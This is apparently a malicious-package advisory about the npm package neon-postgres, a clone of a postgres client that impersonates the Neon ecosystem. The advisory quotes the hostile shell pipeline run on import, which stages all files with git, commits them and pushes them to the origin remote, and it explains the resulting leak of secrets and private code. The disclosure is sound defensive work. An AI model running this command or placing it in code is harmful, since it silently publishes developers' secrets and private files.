OpenSSF/OSV advisory MAL-2026-10537 confirms this npm version as malicious. neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main`...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in neon-postgres (npm)
Details
neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main`. This fires the moment any consumer `require()`s or `import`s the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote `origin` is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The `neon-postgres` name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.
Decision reason
No blocking static signals were detected.; previous stored version diff introduced dangerous source